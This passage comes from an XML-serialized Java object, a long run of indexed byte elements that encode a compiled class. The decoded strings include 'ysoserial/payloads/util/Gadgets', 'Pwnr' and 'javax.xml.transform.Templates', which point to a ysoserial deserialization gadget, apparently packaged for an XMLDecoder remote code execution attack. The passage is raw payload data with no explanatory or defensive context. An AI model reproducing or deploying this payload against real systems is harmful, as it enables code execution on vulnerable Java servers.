index=\"2385\"><byte>27</byte></void><void index=\"2386\"><byte>0</byte></void><void index=\"2387\"><byte>2</byte></void><void index=\"2388\"><byte>0</byte></void><void index=\"2389\"><byte>12</byte></void><void index=\"2390\"><byte>0</byte></void><void index=\"2391\"><byte>0</byte></void><void index=\"2392\"><byte>0</byte></void><void index=\"2393\"><byte>73</byte></void><void index=\"2394\"><byte>0</byte></void><void index=\"2395\"><byte>0</byte></void><void index=\"2396\"><byte>0</byte></void><void index=\"2397\"><byte>4</byte></void><void index=\"2398\"><byte>0</byte></void><void index=\"2399\"><byte>0</byte></void><void index=\"2400\"><byte>0</byte></void><void index=\"2401\"><byte>1</byte></void><void index=\"2402\"><byte>-79</byte></void><void index=\"2403\"><byte>0</byte></void><void index=\"2404\"><byte>0</byte></void><void index=\"2405\"><byte>0</byte></void><void index=\"2406\"><byte>2</byte></void><void index=\"2407\"><byte>0</byte></void><void index=\"2408\"><byte>13</byte></void><void index=\"2409\"><byte>0</byte></void><void index=\"2410\"><byte>0</byte></void><void index=\"2411\"><byte>0</byte></void><void index=\"2412\"><byte>6</byte></void><void index=\"2413\"><byte>0</byte></void><void index=\"2414\"><byte>1</byte></void><void index=\"2415\"><byte>0</byte></void><void index=\"2416\"><byte>0</byte></void><void index=\"2417\"><byte>0</byte></void><void index=\"2418\"><byte>50</byte></void><void index=\"2419\"><byte>0</byte></void><void index=\"2420\"><byte>14</byte></void><void index=\"2421\"><byte>0</byte></void><void index=\"2422\"><byte>0</byte></void><void index=\"2423\"><byte>0</byte></void><void index=\"2424\"><byte>42</byte></void><void index=\"2425\"><byte>0</byte></void><void index=\"2426\"><byte>4</byte></void><void index=\"2427\"><byte>0</byte></void><void index=\"2428\"><byte>0</byte></void><void index=\"2429\"><byte>0</byte></void><void index=\"2430\"><byte>1</byte></void><void index=\"2431\"><byte>0</byte></void><void index=\"2432\"><byte>15</byte></void><void index=\"2433\"><byte>0</byte></void><void index=\"2434\"><byte>98</byte></void><void index=\"2435\"><byte>0</byte></void><void index=\"2436\"><byte>0</byte></void><void index=\"2437\"><byte>0</byte></void><void index=\"2438\"><byte>0</byte></void><void index=\"2439\"><byte>0</byte></void><void index=\"2440\"><byte>1</byte></void><void index=\"2441\"><byte>0</byte></void><void index=\"2442\"><byte>21</byte></void><void index=\"2443\"><byte>0</byte></void><void index=\"2444\"><byte>22</byte></void><void index=\"2445\"><byte>0</byte></void><void index=\"2446\"><byte>1</byte></void><void index=\"2447\"><byte>0</byte></void><void index=\"2448\"><byte>0</byte></void><void index=\"2449\"><byte>0</byte></void><void index=\"2450\"><byte>1</byte></void><void index=\"2451\"><byte>0</byte></void><void index=\"2452\"><byte>28</byte></void><void index=\"2453\"><byte>0</byte></void><void index=\"2454\"><byte>29</byte></void><void index=\"2455\"><byte>0</byte></void><void index=\"2456\"><byte>2</byte></void><void index=\"2457\"><byte>0</byte></void><void index=\"2458\"><byte>0</byte></void><void index=\"2459\"><byte>0</byte></void><void index=\"2460\"><byte>1</byte></void><void index=\"2461\"><byte>0</byte></void><void index=\"2462\"><byte>30</byte></void><void index=\"2463\"><byte>0</byte></void><void index=\"2464\"><byte>31</byte></void><void index=\"2465\"><byte>0</byte></void><void index=\"2466\"><byte>3</byte></void><void index=\"2467\"><byte>0</byte></void><void index=\"2468\"><byte>25</byte></void><void index=\"2469\"><byte>0</byte></void><void index=\"2470\"><byte>0</byte></void><void index=\"2471\"><byte>0</byte></void><void index=\"2472\"><byte>4</byte></void><void index=\"2473\"><byte>0</byte></void><void index=\"2474\"><byte>1</byte></void><void index=\"2475\"><byte>0</byte></void><void index=\"2476\"><byte>26</byte></void><void index=\"2477\"><byte>0</byte></void><void index=\"2478\"><byte>8</byte></void><void index=\"2479\"><byte>0</byte></void><void index=\"2480\"><byte>41</byte></void><void index=\"2481\"><byte>0</byte></void><void index=\"2482\"><byte>11</byte></void><void index=\"2483\"><byte>0</byte></void><void index=\"2484\"><byte>1</byte></void><void index=\"2485\"><byte>0</byte></void><void index=\"2486\"><byte>12</byte></void><void index=\"2487\"><byte>0</byte></void><void index=\"2488\"><byte>0</byte></void><void index=\"2489\"><byte>0</byte></void><void index=\"2490\"><byte>81</byte></void><void index=\"2491\"><byte>0</byte></void><void index=\"2492\"><byte>6</byte></void><void index=\"2493\"><byte>0</byte></void><void index=\"2494\"><byte>2</byte></void><void index=\"2495\"><byte>0</byte></void><void index=\"2496\"><byte>0</byte></void><void index=\"2497\"><byte>0</byte></void><void index=\"2498\"><byte>60</byte></void><void index=\"2499\"><byte>-89</byte></void><void index=\"2500\"><byte>0</byte></void><void index=\"2501\"><byte>3</byte></void><void index=\"2502\"><byte>1</byte></void><void index=\"2503\"><byte>76</byte></void><void index=\"2504\"><byte>-69</byte></void><void index=\"2505\"><byte>0</byte></void><void index=\"2506\"><byte>43</byte></void><void index=\"2507\"><byte>89</byte></void><void index=\"2508\"><byte>-69</byte></void><void index=\"2509\"><byte>0</byte></void><void index=\"2510\"><byte>45</byte></void><void index=\"2511\"><byte>89</byte></void><void index=\"2512\"><byte>-73</byte></void><void index=\"2513\"><byte>0</byte></void><void index=\"2514\"><byte>46</byte></void><void index=\"2515\"><byte>-72</byte></void><void index=\"2516\"><byte>0</byte></void><void index=\"2517\"><byte>52</byte></void><void index=\"2518\"><byte>-74</byte></void><void index=\"2519\"><byte>0</byte></void><void index=\"2520\"><byte>56</byte></void><void index=\"2521\"><byte>18</byte></void><void index=\"2522\"><byte>58</byte></void><void index=\"2523\"><byte>-74</byte></void><void index=\"2524\"><byte>0</byte></void><void index=\"2525\"><byte>64</byte></void><void index=\"2526\"><byte>-74</byte></void><void index=\"2527\"><byte>0</byte></void><void index=\"2528\"><byte>70</byte></void><void index=\"2529\"><byte>-74</byte></void><void index=\"2530\"><byte>0</byte></void><void index=\"2531\"><byte>74</byte></void><void index=\"2532\"><byte>18</byte></void><void index=\"2533\"><byte>76</byte></void><void index=\"2534\"><byte>-74</byte></void><void index=\"2535\"><byte>0</byte></void><void index=\"2536\"><byte>74</byte></void><void index=\"2537\"><byte>-74</byte></void><void index=\"2538\"><byte>0</byte></void><void index=\"2539\"><byte>79</byte></void><void index=\"2540\"><byte>-73</byte></void><void index=\"2541\"><byte>0</byte></void><void index=\"2542\"><byte>82</byte></void><void index=\"2543\"><byte>-69</byte></void><void index=\"2544\"><byte>0</byte></void><void index=\"2545\"><byte>84</byte></void><void index=\"2546\"><byte>89</byte></void><void index=\"2547\"><byte>18</byte></void><void index=\"2548\"><byte>86</byte></void><void index=\"2549\"><byte>-73</byte></void><void index=\"2550\"><byte>0</byte></void><void index=\"2551\"><byte>87</byte></void><void index=\"2552\"><byte>-74</byte></void><void index=\"2553\"><byte>0</byte></void><void index=\"2554\"><byte>92</byte></void><void index=\"2555\"><byte>-74</byte></void><void index=\"2556\"><byte>0</byte></void><void index=\"2557\"><byte>95</byte></void><void index=\"2558\"><byte>-79</byte></void><void index=\"2559\"><byte>0</byte></void><void index=\"2560\"><byte>0</byte></void><void index=\"2561\"><byte>0</byte></void><void index=\"2562\"><byte>1</byte></void><void index=\"2563\"><byte>0</byte></void><void index=\"2564\"><byte>96</byte></void><void index=\"2565\"><byte>0</byte></void><void index=\"2566\"><byte>0</byte></void><void index=\"2567\"><byte>0</byte></void><void index=\"2568\"><byte>3</byte></void><void index=\"2569\"><byte>0</byte></void><void index=\"2570\"><byte>1</byte></void><void index=\"2571\"><byte>3</byte></void><void index=\"2572\"><byte>0</byte></void><void index=\"2573\"><byte>2</byte></void><void index=\"2574\"><byte>0</byte></void><void index=\"2575\"><byte>32</byte></void><void index=\"2576\"><byte>0</byte></void><void index=\"2577\"><byte>0</byte></void><void index=\"2578\"><byte>0</byte></void><void index=\"2579\"><byte>2</byte></void><void index=\"2580\"><byte>0</byte></void><void index=\"2581\"><byte>33</byte></void><void index=\"2582\"><byte>0</byte></void><void index=\"2583\"><byte>17</byte></void><void index=\"2584\"><byte>0</byte></void><void index=\"2585\"><byte>0</byte></void><void index=\"2586\"><byte>0</byte></void><void index=\"2587\"><byte>10</byte></void><void index=\"2588\"><byte>0</byte></void><void index=\"2589\"><byte>1</byte></void><void index=\"2590\"><byte>0</byte></void><void index=\"2591\"><byte>2</byte></void><void index=\"2592\"><byte>0</byte></void><void index=\"2593\"><byte>35</byte></void><void index=\"2594\"><byte>0</byte></void><void index=\"2595\"><byte>16</byte></void><void index=\"2596\"><byte>0</byte></void><void index=\"2597\"><byte>9</byte></void><void index=\"2598\"><byte>117</byte></void><void index=\"2599\"><byte>113</byte></void><void index=\"2600\"><byte>0</byte></void><void index=\"2601\"><byte>126</byte></void><void index=\"2602\"><byte>0</byte></void><void index=\"2603\"><byte>11</byte></void><void index=\"2604\"><byte>0</byte></void><void index=\"2605\"><byte>0</byte></void><void index=\"2606\"><byte>1</byte></void><void index=\"2607\"><byte>-44</byte></void><void index=\"2608\"><byte>-54</byte></void><void index=\"2609\"><byte>-2</byte></void><void index=\"2610\"><byte>-70</byte></void><void index=\"2611\"><byte>-66</byte></void><void index=\"2612\"><byte>0</byte></void><void index=\"2613\"><byte>0</byte></void><void index=\"2614\"><byte>0</byte></void><void index=\"2615\"><byte>50</byte></void><void index=\"2616\"><byte>0</byte></void><void index=\"2617\"><byte>27</byte></void><void index=\"2618\"><byte>10</byte></void><void index=\"2619\"><byte>0</byte></void><void index=\"2620\"><byte>3</byte></void><void index=\"2621\"><byte>0</byte></void><void index=\"2622\"><byte>21</byte></void><void index=\"2623\"><byte>7</byte></void><void index=\"2624\"><byte>0</byte></void><void index=\"2625\"><byte>23</byte></void><void index=\"2626\"><byte>7</byte></void><void index=\"2627\"><byte>0</byte></void><void index=\"2628\"><byte>24</byte></void><void index=\"2629\"><byte>7</byte></void><void index=\"2630\"><byte>0</byte></void><void index=\"2631\"><byte>25</byte></void><void index=\"2632\"><byte>1</byte></void><void index=\"2633\"><byte>0</byte></void><void index=\"2634\"><byte>16</byte></void><void index=\"2635\"><byte>115</byte></void><void index=\"2636\"><byte>101</byte></void><void index=\"2637\"><byte>114</byte></void><void index=\"2638\"><byte>105</byte></void><void index=\"2639\"><byte>97</byte></void><void index=\"2640\"><byte>108</byte></void><void index=\"2641\"><byte>86</byte></void><void index=\"2642\"><byte>101</byte></void><void index=\"2643\"><byte>114</byte></void><void index=\"2644\"><byte>115</byte></void><void index=\"2645\"><byte>105</byte></void><void index=\"2646\"><byte>111</byte></void><void index=\"2647\"><byte>110</byte></void><void index=\"2648\"><byte>85</byte></void><void index=\"2649\"><byte>73</byte></void><void index=\"2650\"><byte>68</byte></void><void index=\"2651\"><byte>1</byte></void><void index=\"2652\"><byte>0</byte></void><void index=\"2653\"><byte>1</byte></void><void index=\"2654\"><byte>74</byte></void><void index=\"2655\"><byte>1</byte></void><void index=\"2656\"><byte>0</byte></void><void index=\"2657\"><byte>13</byte></void><void index=\"2658\"><byte>67</byte></void><void index=\"2659\"><byte>111</byte></void><void index=\"2660\"><byte>110</byte></void><void index=\"2661\"><byte>115</byte></void><void index=\"2662\"><byte>116</byte></void><void index=\"2663\"><byte>97</byte></void><void index=\"2664\"><byte>110</byte></void><void index=\"2665\"><byte>116</byte></void><void index=\"2666\"><byte>86</byte></void><void index=\"2667\"><byte>97</byte></void><void index=\"2668\"><byte>108</byte></void><void index=\"2669\"><byte>117</byte></void><void index=\"2670\"><byte>101</byte></void><void index=\"2671\"><byte>5</byte></void><void index=\"2672\"><byte>113</byte></void><void index=\"2673\"><byte>-26</byte></void><void index=\"2674\"><byte>105</byte></void><void index=\"2675\"><byte>-18</byte></void><void index=\"2676\"><byte>60</byte></void><void index=\"2677\"><byte>109</byte></void><void index=\"2678\"><byte>71</byte></void><void index=\"2679\"><byte>24</byte></void><void index=\"2680\"><byte>1</byte></void><void index=\"2681\"><byte>0</byte></void><void index=\"2682\"><byte>6</byte></void><void index=\"2683\"><byte>60</byte></void><void index=\"2684\"><byte>105</byte></void><void index=\"2685\"><byte>110</byte></void><void index=\"2686\"><byte>105</byte></void><void index=\"2687\"><byte>116</byte></void><void index=\"2688\"><byte>62</byte></void><void index=\"2689\"><byte>1</byte></void><void index=\"2690\"><byte>0</byte></void><void index=\"2691\"><byte>3</byte></void><void index=\"2692\"><byte>40</byte></void><void index=\"2693\"><byte>41</byte></void><void index=\"2694\"><byte>86</byte></void><void index=\"2695\"><byte>1</byte></void><void index=\"2696\"><byte>0</byte></void><void index=\"2697\"><byte>4</byte></void><void index=\"2698\"><byte>67</byte></void><void index=\"2699\"><byte>111</byte></void><void index=\"2700\"><byte>100</byte></void><void index=\"2701\"><byte>101</byte></void><void index=\"2702\"><byte>1</byte></void><void index=\"2703\"><byte>0</byte></void><void index=\"2704\"><byte>15</byte></void><void index=\"2705\"><byte>76</byte></void><void index=\"2706\"><byte>105</byte></void><void index=\"2707\"><byte>110</byte></void><void index=\"2708\"><byte>101</byte></void><void index=\"2709\"><byte>78</byte></void><void index=\"2710\"><byte>117</byte></void><void index=\"2711\"><byte>109</byte></void><void index=\"2712\"><byte>98</byte></void><void index=\"2713\"><byte>101</byte></void><void index=\"2714\"><byte>114</byte></void><void index=\"2715\"><byte>84</byte></void><void index=\"2716\"><byte>97</byte></void><void index=\"2717\"><byte>98</byte></void><void index=\"2718\"><byte>108</byte></void><void index=\"2719\"><byte>101</byte></void><void index=\"2720\"><byte>1</byte></void><void index=\"2721\"><byte>0</byte></void><void index=\"2722\"><byte>18</byte></void><void index=\"2723\"><byte>76</byte></void><void index=\"2724\"><byte>111</byte></void><void index=\"2725\"><byte>99</byte></void><void index=\"2726\"><byte>97</byte></void><void index=\"2727\"><byte>108</byte></void><void index=\"2728\"><byte>86</byte></void><void index=\"2729\"><byte>97</byte></void><void index=\"2730\"><byte>114</byte></void><void index=\"2731\"><byte>105</byte></void><void index=\"2732\"><byte>97</byte></void><void index=\"2733\"><byte>98</byte></void><void index=\"2734\"><byte>108</byte></void><void index=\"2735\"><byte>101</byte></void><void index=\"2736\"><byte>84</byte></void><void index=\"2737\"><byte>97</byte></void><void index=\"2738\"><byte>98</byte></void><void index=\"2739\"><byte>108</byte></void><void index=\"2740\"><byte>101</byte></void><void index=\"2741\"><byte>1</byte></void><void index=\"2742\"><byte>0</byte></void><void index=\"2743\"><byte>4</byte></void><void index=\"2744\"><byte>116</byte></void><void index=\"2745\"><byte>104</byte></void><void index=\"2746\"><byte>105</byte></void><void index=\"2747\"><byte>115</byte></void><void index=\"2748\"><byte>1</byte></void><void index=\"2749\"><byte>0</byte></void><void index=\"2750\"><byte>3</byte></void><void index=\"2751\"><byte>70</byte></void><void index=\"2752\"><byte>111</byte></void><void index=\"2753\"><byte>111</byte></void><void index=\"2754\"><byte>1</byte></void><void index=\"2755\"><byte>0</byte></void><void index=\"2756\"><byte>12</byte></void><void index=\"2757\"><byte>73</byte></void><void index=\"2758\"><byte>110</byte></void><void index=\"2759\"><byte>110</byte></void><void index=\"2760\"><byte>101</byte></void><void index=\"2761\"><byte>114</byte></void><void index=\"2762\"><byte>67</byte></void><void index=\"2763\"><byte>108</byte></void><void index=\"2764\"><byte>97</byte></void><void index=\"2765\"><byte>115</byte></void><void index=\"2766\"><byte>115</byte></void><void index=\"2767\"><byte>101</byte></void><void index=\"2768\"><byte>115</byte></void><void index=\"2769\"><byte>1</byte></void><void index=\"2770\"><byte>0</byte></void><void index=\"2771\"><byte>37</byte></void><void index=\"2772\"><byte>76</byte></void><void index=\"2773\"><byte>121</byte></void><void index=\"2774\"><byte>115</byte></void><void index=\"2775\"><byte>111</byte></void><void index=\"2776\"><byte>115</byte></void><void index=\"2777\"><byte>101</byte></void><void index=\"2778\"><byte>114</byte></void><void index=\"2779\"><byte>105</byte></void><void index=\"2780\"><byte>97</byte></void><void index=\"2781\"><byte>108</byte></void><void index=\"2782\"><byte>47</byte></void><void index=\"2783\"><byte>112</byte></void><void index=\"2784\"><byte>97</byte></void><void index=\"2785\"><byte>121</byte></void><void index=\"2786\"><byte>108</byte></void><void index=\"2787\"><byte>111</byte></void><void index=\"2788\"><byte>97</byte></void><void index=\"2789\"><byte>100</byte></void><void index=\"2790\"><byte>115</byte></void><void index=\"2791\"><byte>47</byte></void><void index=\"2792\"><byte>117</byte></void><void index=\"2793\"><byte>116</byte></void><void index=\"2794\"><byte>105</byte></void><void index=\"2795\"><byte>108</byte></void><void index=\"2796\"><byte>47</byte></void><void index=\"2797\"><byte>71</byte></void><void index=\"2798\"><byte>97</byte></void><void index=\"2799\"><byte>100</byte></void><void index=\"2800\"><byte>103</byte></void><void index=\"2801\"><byte>101</byte></void><void index=\"2802\"><byte>116</byte></void><void index=\"2803\"><byte>115</byte></void><void index=\"2804\"><byte>36</byte></void><void index=\"2805\"><byte>70</byte></void><void index=\"2806\"><byte>111</byte></void><void index=\"2807\"><byte>111</byte></void><void index=\"2808\"><byte>59</byte></void><void index=\"2809\"><byte>1</byte></void><void index=\"2810\"><byte>0</byte></void><void index=\"2811\"><byte>10</byte></void><void index=\"2812\"><byte>83</byte></void><void index=\"2813\"><byte>111</byte></void><void index=\"2814\"><byte>117</byte></void><void index=\"2815\"><byte>114</byte></void><void index=\"2816\"><byte>99</byte></void><void index=\"2817\"><byte>101</byte></void><void index=\"2818\"><byte>70</byte></void><void index=\"2819\"><byte>105</byte></void><void index=\"2820\"><byte>108</byte></void><void index=\"2821\"><byte>101</byte></void><void index=\"2822\"><byte>1</byte></void><void index=\"2823\"><byte>0</byte></void><void index=\"2824\"><byte>12</byte></void><void index=\"2825\"><byte>71</byte></void><void index=\"2826\"><byte>97</byte></void><void index=\"2827\"><byte>100</byte></void><void index=\"2828\"><byte>103</byte></void><void index=\"2829\"><byte>101</byte></void><void index=\"2830\"><byte>116</byte></void><void index=\"2831\"><byte>115</byte></void><void index=\"2832\"><byte>46</byte></void><void index=\"2833\"><byte>106</byte></void><void index=\"2834\"><byte>97</byte></void><void index=\"2835\"><byte>118</byte></void><void index=\"2836\"><byte>97</byte></void><void index=\"2837\"><byte>12</byte></void><void index=\"2838\"><byte>0</byte></void><void index=\"2839\"><byte>10</byte></void><void index=\"2840\"><byte>0</byte></void><void index=\"2841\"><byte>11</byte></void><void index=\"2842\"><byte>7</byte></void><void index=\"2843\"><byte>0</byte></void><void index=\"2844\"><byte>26</byte></void><void index=\"2845\"><byte>1</byte></void><void index=\"2846\"><byte>0</byte></void><void index=\"2847\"><byte>35</byte></void><void index=\"2848\"><byte>121</byte></void><void index=\"2849\"><byte>115</byte></void><void index=\"2850\"><byte>111</byte></void><void index=\"2851\"><byte>115</byte></void><void index=\"2852\"><byte>101</byte></void><void index=\"2853\"><byte>114</byte></void><void index=\"2854\"><byte>105</byte></void><void index=\"2855\"><byte>97</byte></void><void index=\"2856\"><byte>108</byte></void><void index=\"2857\"><byte>47</byte></void><void index=\"2858\"><byte>112</byte></void><void index=\"2859\"><byte>97</byte></void><void index=\"2860\"><byte>121</byte></void><void index=\"2861\"><byte>108</byte></void><void index=\"2862\"><byte>111</byte></void><void index=\"2863\"><byte>97</byte></void><void index=\"2864\"><byte>100</byte></void><void index=\"2865\"><byte>115</byte></void><void index=\"2866\"><byte>47</byte></void><void index=\"2867\"><byte>117</byte></void><void index=\"2868\"><byte>116</byte></void><void index=\"2869\"><byte>105</byte></void><void index=\"2870\"><byte>108</byte></void><void index=\"2871\"><byte>47</byte></void><void index=\"2872\"><byte>71</byte></void><void index=\"2873\"><byte>97</byte></void><void index=\"2874\"><byte>100</byte></void><void index=\"2875\"><byte>103</byte></void><void index=\"2876\"><byte>101</byte></void><void index=\"2877\"><byte>116</byte></void><void index=\"2878\"><byte>115</byte></void><void index=\"2879\"><byte>36</byte></void><void index=\"2880\"><byte>70</byte></void><void index=\"2881\"><byte>111</byte></void><void index=\"2882\"><byte>111</byte></void><void index=\"2883\"><byte>1</byte></void><void index=\"2884\"><byte>0</byte></void><void index=\"2885\"><byte>16</byte></void><void index=\"2886\"><byte>106</byte></void><void index=\"2887\"><byte>97</byte></void><void index=\"2888\"><byte>118</byte></void><void index=\"2889\"><byte>97</byte></void><void index=\"2890\"><byte>47</byte></void><void index=\"2891\"><byte>108</byte></void><void index=\"2892\"><byte>97</byte></void><void index=\"2893\"><byte>110</byte></void><void index=\"2894\"><byte>103</byte></void><void index=\"2895\"><byte>47</byte></void><void index=\"2896\"><byte>79</byte></void><void index=\"2897\"><byte>98</byte></void><void index=\"2898\"><byte>106</byte></void><void index=\"2899\"><byte>101</byte></void><void index=\"2900\"><byte>99</byte></void><void index=\"2901\"><byte>116</byte></void><void index=\"2902\"><byte>1</byte></void><void index=\"2903\"><byte>0</byte></void><void index=\"2904\"><byte>20</byte></void><void index=\"2905\"><byte>106</byte></void><void index=\"2906\"><byte>97</byte></void><void index=\"2907\"><byte>118</byte></void><void index=\"2908\"><byte>97</byte></void><void index=\"2909\"><byte>47</byte></void><void index=\"2910\"><byte>105</byte></void><void index=\"2911\"><byte>111</byte></void><void index=\"2912\"><byte>47</byte></void><void index=\"2913\"><byte>83</byte></void><void index=\"2914\"><byte>101</byte></void><void index=\"2915\"><byte>114</byte></void><void index=\"2916\"><byte>105</byte></void><void index=\"2917\"><byte>97</byte></void><void index=\"2918\"><byte>108</byte></void><void index=\"2919\"><byte>105</byte></void><void index=\"2920\"><byte>122</byte></void><void index=\"2921\"><byte>97</byte></void><void index=\"2922\"><byte>98</byte></void><void index=\"2923\"><byte>108</byte></void><void index=\"2924\"><byte>101</byte></void><void index=\"2925\"><byte>1</byte></void><void index=\"2926\"><byte>0</byte></void><void index=\"2927\"><byte>31</byte></void><void index=\"2928\"><byte>121</byte></void><void index=\"2929\"><byte>115</byte></void><void index=\"2930\"><byte>111</byte></void><void index=\"2931\"><byte>115</byte></void><void index=\"2932\"><byte>101</byte></void><void index=\"2933\"><byte>114</byte></void><void index=\"2934\"><byte>105</byte></void><void index=\"2935\"><byte>97</byte></void><void index=\"2936\"><byte>108</byte></void><void index=\"2937\"><byte>47</byte></void><void index=\"2938\"><byte>112</byte></void><void index=\"2939\"><byte>97</byte></void><void index=\"2940\"><byte>121</byte></void><void index=\"2941\"><byte>108</byte></void><void index=\"2942\"><byte>111</byte></void><void index=\"2943\"><byte>97</byte></void><void index=\"2944\"><byte>100</byte></void><void index=\"2945\"><byte>115</byte></void><void index=\"2946\"><byte>47</byte></void><void index=\"2947\"><byte>117</byte></void><void index=\"2948\"><byte>116</byte></void><void index=\"2949\"><byte>105</byte></void><void index=\"2950\"><byte>108</byte></void><void index=\"2951\"><byte>47</byte></void><void index=\"2952\"><byte>71</byte></void><void index=\"2953\"><byte>97</byte></void><void index=\"2954\"><byte>100</byte></void><void index=\"2955\"><byte>103</byte></void><void index=\"2956\"><byte>101</byte></void><void index=\"2957\"><byte>116</byte></void><void index=\"2958\"><byte>115</byte></void><void index=\"2959\"><byte>0</byte></void><void index=\"2960\"><byte>33</byte></void><void index=\"2961\"><byte>0</byte></void><void index=\"2962\"><byte>2</byte></void><void index=\"2963\"><byte>0</byte></void><void index=\"2964\"><byte>3</byte></void><void index=\"2965\"><byte>0</byte></void><void index=\"2966\"><byte>1</byte></void><void index=\"2967\"><byte>0</byte></void><void index=\"2968\"><byte>4</byte></void><void index=\"2969\"><byte>0</byte></void><void index=\"2970\"><byte>1</byte></void><void index=\"2971\"><byte>0</byte></void><void index=\"2972\"><byte>26</byte></void><void index=\"2973\"><byte>0</byte></void><void index=\"2974\"><byte>5</byte></void><void index=\"2975\"><byte>0</byte></void><void index=\"2976\"><byte>6</byte></void><void index=\"2977\"><byte>0</byte></void><void index=\"2978\"><byte>1</byte></void><void index=\"2979\"><byte>0</byte></void><void index=\"2980\"><byte>7</byte></void><void index=\"2981\"><byte>0</byte></void><void index=\"2982\"><byte>0</byte></void><void index=\"2983\"><byte>0</byte></void><void index=\"2984\"><byte>2</byte></void><void index=\"2985\"><byte>0</byte></void><void index=\"2986\"><byte>8</byte></void><void index=\"2987\"><byte>0</byte></void><void index=\"2988\"><byte>1</byte></void><void index=\"2989\"><byte>0</byte></void><void index=\"2990\"><byte>1</byte></void><void index=\"2991\"><byte>0</byte></void><void index=\"2992\"><byte>10</byte></void><void index=\"2993\"><byte>0</byte></void><void index=\"2994\"><byte>11</byte></void><void index=\"2995\"><byte>0</byte></void><void index=\"2996\"><byte>1</byte></void><void index=\"2997\"><byte>0</byte></void><void index=\"2998\"><byte>12</byte></void><void index=\"2999\"><byte>0</byte></void><void index=\"3000\"><byte>0</byte></void><void index=\"3001\"><byte>0</byte></void><void index=\"3002\"><byte>47</byte></void><void index=\"3003\"><byte>0</byte></void><void index=\"3004\"><byte>1</byte></void><void index=\"3005\"><byte>0</byte></void><void index=\"3006\"><byte>1</byte></void><void index=\"3007\"><byte>0</byte></void><void index=\"3008\"><byte>0</byte></void><void index=\"3009\"><byte>0</byte></void><void index=\"3010\"><byte>5</byte></void><void index=\"3011\"><byte>42</byte></void><void index=\"3012\"><byte>-73</byte></void><void index=\"3013\"><byte>0</byte></void><void index=\"3014\"><byte>1</byte></void><void index=\"3015\"><byte>-79</byte></void><void index=\"3016\"><byte>0</byte></void><void index=\"3017\"><byte>0</byte></void><void index=\"3018\"><byte>0</byte></void><void index=\"3019\"><byte>2</byte></void><void index=\"3020\"><byte>0</byte></void><void index=\"3021\"><byte>13</byte></void><void index=\"3022\"><byte>0</byte></void><void index=\"3023\"><byte>0</byte></void><void index=\"3024\"><byte>0</byte></void><void index=\"3025\"><byte>6</byte></void><void index=\"3026\"><byte>0</byte></void><void index=\"3027\"><byte>1</byte></void><void index=\"3028\"><byte>0</byte></void><void index=\"3029\"><byte>0</byte></void><void index=\"3030\"><byte>0</byte></void><void index=\"3031\"><byte>54</byte></void><void index=\"3032\"><byte>0</byte></void><void index=\"3033\"><byte>14</byte></void><void index=\"3034\"><byte>0</byte></void><void index=\"3035\"><byte>0</byte></void><void index=\"3036\"><byte>0</byte></void><void index=\"3037\"><byte>12</byte></void><void index=\"3038\"><byte>0</byte></void><void index=\"3039\"><byte>1</byte></void><void index=\"3040\"><byte>0</byte></void><void index=\"3041\"><byte>0</byte></void><void index=\"3042\"><byte>0</byte></void><void index=\"3043\"><byte>5</byte></void><void index=\"3044\"><byte>0</byte></void><void index=\"3045\"><byte>15</byte></void><void index=\"3046\"><byte>0</byte></void><void index=\"3047\"><byte>18</byte></void><void index=\"3048\"><byte>0</byte></void><void index=\"3049\"><byte>0</byte></void><void index=\"3050\"><byte>0</byte></void><void index=\"3051\"><byte>2</byte></void><void index=\"3052\"><byte>0</byte></void><void index=\"3053\"><byte>19</byte></void><void index=\"3054\"><byte>0</byte></void><void index=\"3055\"><byte>0</byte></void><void index=\"3056\"><byte>0</byte></void><void index=\"3057\"><byte>2</byte></void><void index=\"3058\"><byte>0</byte></void><void index=\"3059\"><byte>20</byte></void><void index=\"3060\"><byte>0</byte></void><void index=\"3061\"><byte>17</byte></void><void index=\"3062\"><byte>0</byte></void><void index=\"3063\"><byte>0</byte></void><void index=\"3064\"><byte>0</byte></void><void index=\"3065\"><byte>10</byte></void><void index=\"3066\"><byte>0</byte></void><void index=\"3067\"><byte>1</byte></void><void index=\"3068\"><byte>0</byte></void><void index=\"3069\"><byte>2</byte></void><void index=\"3070\"><byte>0</byte></void><void index=\"3071\"><byte>22</byte></void><void index=\"3072\"><byte>0</byte></void><void index=\"3073\"><byte>16</byte></void><void index=\"3074\"><byte>0</byte></void><void index=\"3075\"><byte>9</byte></void><void index=\"3076\"><byte>112</byte></void><void index=\"3077\"><byte>116</byte></void><void index=\"3078\"><byte>0</byte></void><void index=\"3079\"><byte>4</byte></void><void index=\"3080\"><byte>80</byte></void><void index=\"3081\"><byte>119</byte></void><void index=\"3082\"><byte>110</byte></void><void index=\"3083\"><byte>114</byte></void><void index=\"3084\"><byte>112</byte></void><void index=\"3085\"><byte>119</byte></void><void index=\"3086\"><byte>1</byte></void><void index=\"3087\"><byte>0</byte></void><void index=\"3088\"><byte>120</byte></void><void index=\"3089\"><byte>115</byte></void><void index=\"3090\"><byte>125</byte></void><void index=\"3091\"><byte>0</byte></void><void index=\"3092\"><byte>0</byte></void><void index=\"3093\"><byte>0</byte></void><void index=\"3094\"><byte>1</byte></void><void index=\"3095\"><byte>0</byte></void><void index=\"3096\"><byte>29</byte></void><void index=\"3097\"><byte>106</byte></void><void index=\"3098\"><byte>97</byte></void><void index=\"3099\"><byte>118</byte></void><void index=\"3100\"><byte>97</byte></void><void index=\"3101\"><byte>120</byte></void><void index=\"3102\"><byte>46</byte></void><void index=\"3103\"><byte>120</byte></void><void index=\"3104\"><byte>109</byte></void><void index=\"3105\"><byte>108</byte></void><void index=\"3106\"><byte>46</byte></void><void index=\"3107\"><byte>116</byte></void><void index=\"3108\"><byte>114</byte></void><void index=\"3109\"><byte>97</byte></void><void index=\"3110\"><byte>110</byte></void><void index=\"3111\"><byte>115</byte></void><void index=\"3112\"><byte>102</byte></void><void index=\"3113\"><byte>111</byte></void><void index=\"3114\"><byte>114</byte></void><void index=\"3115\"><byte>109</byte></void><void index=\"3116\"><byte>46</byte></void><void index=\"3117\"><byte>84</byte></void><void index=\"3118\"><byte>101</byte></void><void index=\"3119\"><byte>109</byte></void><void index=\"3120\"><byte>112</byte></void><void index=\"3121\"><byte>108</byte></void><void index=\"3122\"><byte>97</byte></void><void index=\"3123\"><byte>116</byte></void><void index=\"3124\"><byte>101</byte></void><void index=\"3125\"><byte>115</byte></void><void index=\"3126\"><byte>120</byte></void><void index=\"3127\"><byte>114</byte></void><void index=\"3128\"><byte>0</byte></void><void index=\"3129\"><byte>23</byte></void><void index=\"3130\"><byte>106</byte></void><void index=\"3131\"><byte>97</byte></void><void index=\"3132\"><byte>118</byte></void><void 